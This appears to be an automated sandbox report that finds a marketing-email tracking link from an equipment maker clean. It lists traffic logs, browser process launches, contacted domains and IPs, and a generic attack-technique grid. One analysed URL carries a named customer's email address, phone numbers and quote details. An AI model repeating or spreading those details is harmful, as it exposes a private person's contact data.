Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:50085 version: TLS 1.2
Source: classification engineClassification label: clean2.win@22/152@106/587
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1904,i,15767803162659794346,3062420125091595744,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mktg.rocklandmfg.com/acton/ct/45001/s-00f3-2307/Bct/l-0047/l-0047:bbe6/ct8_0/1/pp?sid=TV2%3AH0Ovdhpra"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1904,i,15767803162659794346,3062420125091595744,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://mktg.rocklandmfg.com/acton/ct/45001/s-00f3-2307/Bct/l-0047/l-0047:bbe6/ct8_0/1/pp?sid=TV2%3AH0Ovdhpra0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
js.hs-banner.com
172.64.147.16
truefalse
    high
    forms.hsforms.com
    104.19.175.188
    truefalse
      high
      star-mini.c10r.facebook.com
      157.240.251.35
      truefalse
        high
        d2js9oo580nbqt.cloudfront.net
        3.165.190.49
        truefalse
          unknown
          maxcdn.bootstrapcdn.com
          104.18.11.207
          truefalse
            high
            js.hsadspixel.net
            104.17.128.172
            truefalse
              high
              js.hs-analytics.net
              104.17.175.201
              truefalse
                high
                forpci53.actonsoftware.com
                207.189.124.53
                truefalse
                  unknown
                  stats.g.doubleclick.net
                  173.194.76.156
                  truefalse
                    high
                    analytics-alv.google.com
                    216.239.38.181
                    truefalse
                      high
                      scontent.xx.fbcdn.net
                      157.240.253.1
                      truefalse
                        high
                        track.hubspot.com
                        104.16.117.116
                        truefalse
                          high
                          code.jquery.com
                          151.101.194.137
                          truefalse
                            high
                            googleads.g.doubleclick.net
                            142.250.184.226
                            truefalse
                              high
                              forms.hscollectedforms.net
                              104.16.108.254
                              truefalse
                                high
                                js.hs-scripts.com
                                104.16.137.209
                                truefalse
                                  high
                                  api.hubapi.com
                                  104.18.241.108
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.184.196
                                    truefalse
                                      high
                                      td.doubleclick.net
                                      216.58.212.130
                                      truefalse
                                        high
                                        auth-owlting.com
                                        91.212.166.21
                                        truefalse
                                          high
                                          pluralism.themancav.com
                                          62.60.154.114
                                          truefalse
                                            high
                                            googlehosted.l.googleusercontent.com
                                            142.250.186.129
                                            truefalse
                                              high
                                              rocklandmfg.com
                                              141.193.213.10
                                              truefalse
                                                unknown
                                                js.hscollectedforms.net
                                                104.16.111.254
                                                truefalse
                                                  high
                                                  mktg.rocklandmfg.com
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    lh5.googleusercontent.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      use.typekit.net
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        www.facebook.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          www.linkedin.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            px.ads.linkedin.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              connect.facebook.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                p.typekit.net
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  snap.licdn.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    analytics.google.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      cdn-forpci53.actonsoftware.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        https://mktg.rocklandmfg.com/acton/fs/blocks/showLandingPage/a/45001/p/p-0008/t/page/fm/0?email=Abradford@carolinacat.com&quote=376429&recid=l-0047:bbe6&items=HD%20Heavy-Duty%20Excavator%20Bucket&nbsp;&nbsp;&nbsp;Caterpillar&nbsp;315C&nbsp;&nbsp;&nbsp;Qty.%201&nbsp;&nbsp;&nbsp;5%20Weeks%20Standard%20Lead%20Time&Phone=828-464-7045&Mobile=828-514-8836&utm_term=No&utm_campaign=Following%20up%20on%20Rockland%20quote%20%2523376429&utm_content=email&utm_source=Act-On+Software&utm_medium=email&cm_mmc=Act-On%20Software-_-email-_-Following%20up%20on%20Rockland%20quote%20%2523376429-_-No&sid=TV2:H0Ovdhprafalse
                                                                          unknown
                                                                          https://rocklandmfg.com/false
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            173.194.76.156
                                                                            stats.g.doubleclick.netUnited States
                                                                            15169GOOGLEUSfalse
                                                                            2.18.64.220
                                                                            unknownEuropean Union
                                                                            6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                                            173.194.76.84
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            3.165.190.49
                                                                            d2js9oo580nbqt.cloudfront.netUnited States
                                                                            16509AMAZON-02USfalse
                                                                            142.250.185.227
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.185.106
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            104.16.118.116
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            2.19.126.200
                                                                            unknownEuropean Union
                                                                            16625AKAMAI-ASUSfalse
                                                                            91.212.166.21
                                                                            auth-owlting.comUnited Kingdom
                                                                            35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                                                            104.16.107.254
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.184.226
                                                                            googleads.g.doubleclick.netUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.184.228
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.186.74
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            104.124.11.217
                                                                            unknownUnited States
                                                                            20940AKAMAI-ASN1EUfalse
                                                                            104.17.128.172
                                                                            js.hsadspixel.netUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.186.35
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.186.78
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.184.196
                                                                            www.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            1.1.1.1
                                                                            unknownAustralia
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.18.80.204
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.18.241.108
                                                                            api.hubapi.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.16.137.209
                                                                            js.hs-scripts.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            207.189.124.53
                                                                            forpci53.actonsoftware.comUnited States
                                                                            393648ACTON-SOFTWAREUSfalse
                                                                            13.107.42.14
                                                                            unknownUnited States
                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                            104.17.175.201
                                                                            js.hs-analytics.netUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            239.255.255.250
                                                                            unknownReserved
                                                                            unknownunknownfalse
                                                                            104.16.141.209
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.186.142
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.186.40
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            157.240.253.35
                                                                            unknownUnited States
                                                                            32934FACEBOOKUSfalse
                                                                            142.250.185.78
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            104.19.175.188
                                                                            forms.hsforms.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.18.243.108
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.185.168
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            216.239.38.181
                                                                            analytics-alv.google.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            104.16.110.254
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.181.232
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            172.64.147.16
                                                                            js.hs-banner.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.16.111.254
                                                                            js.hscollectedforms.netUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.186.132
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            151.101.194.137
                                                                            code.jquery.comUnited States
                                                                            54113FASTLYUSfalse
                                                                            172.217.18.10
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            216.58.212.130
                                                                            td.doubleclick.netUnited States
                                                                            15169GOOGLEUSfalse
                                                                            172.217.18.98
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            62.60.154.114
                                                                            pluralism.themancav.comIran (ISLAMIC Republic Of)
                                                                            15611IROST-ASIRfalse
                                                                            104.18.41.41
                                                                            unknownUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            142.250.186.163
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            104.16.108.254
                                                                            forms.hscollectedforms.netUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            104.18.11.207
                                                                            maxcdn.bootstrapcdn.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            141.193.213.10
                                                                            rocklandmfg.comUnited States
                                                                            396845DV-PRIMARY-ASN1USfalse
                                                                            151.101.2.137
                                                                            unknownUnited States
                                                                            54113FASTLYUSfalse
                                                                            142.250.185.170
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            157.240.251.9
                                                                            unknownUnited States
                                                                            32934FACEBOOKUSfalse
                                                                            142.250.186.129
                                                                            googlehosted.l.googleusercontent.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            142.250.181.227
                                                                            unknownUnited States
                                                                            15169GOOGLEUSfalse
                                                                            2.19.126.211
                                                                            unknownEuropean Union
                                                                            16625AKAMAI-ASUSfalse
                                                                            157.240.253.1
                                                                            scontent.xx.fbcdn.netUnited States
                                                                            32934FACEBOOKUSfalse
                                                                            104.16.117.116
                                                                            track.hubspot.comUnited States
                                                                            13335CLOUDFLARENETUSfalse
                                                                            157.240.251.35
                                                                            star-mini.c10r.facebook.comUnited States
                                                                            32934FACEBOOKUSfalse
                                                                            IP
                                                                            192.168.2.17
                                                                            192.168.2.16
                                                                            192.168.2.18
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1558838
                                                                            Start date and time:2024-11-19 21:04:31 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
